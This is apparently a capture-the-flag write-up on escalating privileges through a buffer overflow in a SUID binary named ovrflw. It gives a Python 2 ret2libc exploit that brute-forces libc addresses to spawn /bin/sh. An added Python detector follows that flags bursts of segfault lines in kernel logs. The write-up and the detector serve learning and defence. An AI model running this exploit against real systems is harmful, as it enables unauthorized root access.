I wanted to check the version:
I ran a command to find files with the SUID permission:
As the name says “overflow”, I will probably have to find a buffer overflow in this binary.
I need to find the exact location of specific registers:
Previously I noticed that there was a hint in the registers:
On the remote host, I will be collecting data for the script:
Script code:
# Python 2 script (print statement, str payload)
from subprocess import call
import struct

# ldd <binary_name> | grep libc.so.6
libc_base_addr = 0xb75b2000
# change location of libc.so.6 to the correct one - based on previous command
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
system_off = 0x00040310
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
exit_off = 0x00033290
# strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh
arg_off = 0x000162bac

# pack each address as a 32-bit little-endian value
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
arg_addr = struct.pack("<I", libc_base_addr + arg_off)

buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += arg_addr

i = 0
while (i < 512):
    print "Try %s" % i
    i += 1
    ret = call(["/usr/local/bin/ovrflw", buf])
I have successfully escalated privileges 🙂
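
From the defender's side, the retry loop in the script above is noisy: a failed attempt typically crashes the SUID binary, and a kernel that logs unhandled segfaults records one line per crash. The following is an added example, not part of the original write-up, that flags such crash bursts in a kernel log; the log lines are constructed samples, and the threshold and window values are assumptions to tune per host.

```python
import re
from collections import defaultdict

# Constructed sample log (not from the original post): six rapid crashes of
# one binary, one isolated crash of another program, one unrelated line.
SAMPLE_LOG = "\n".join(
    [f"Jan 10 12:00:0{i} host kernel: [  100.{i}00000] ovrflw[{2100 + i}]: "
     f"segfault at b76{i}2310 ip b76{i}2310 sp bf9a1c40 error 14"
     for i in range(6)]
    + ["Jan 10 12:03:00 host kernel: [  280.000000] cron[900]: "
       "segfault at 0 ip 0804f1a2 sp bfd01230 error 4 in cron[8048000+9000]",
       "Jan 10 12:00:09 host sshd[800]: Accepted password for user"]
)

# Matches the x86 kernel "segfault at ... ip ..." message and captures the
# kernel timestamp (seconds since boot) and the crashing command name.
SEGFAULT_RE = re.compile(
    r"kernel: \[\s*(?P<ts>\d+\.\d+)\] (?P<comm>[^\[\s]+)\[(?P<pid>\d+)\]: "
    r"segfault at (?P<addr>[0-9a-f]+) ip (?P<ip>[0-9a-f]+)"
)

def crash_bursts(log_text, threshold=5, window=10.0):
    """Return {command: peak crash count inside any `window`-second span}
    for every command whose peak reaches `threshold`."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        m = SEGFAULT_RE.search(line)
        if m:
            times[m["comm"]].append(float(m["ts"]))
    flagged = {}
    for comm, ts in times.items():
        ts.sort()
        start = best = 0
        for end in range(len(ts)):
            # Slide the left edge until the span fits inside the window.
            while ts[end] - ts[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[comm] = best
    return flagged

if __name__ == "__main__":
    for comm, count in crash_bursts(SAMPLE_LOG).items():
        print(f"ALERT: {comm} crashed {count} times within 10s")
```

Pairing this alert with an inventory of SUID binaries makes a burst from a privileged binary stand out from ordinary application crashes.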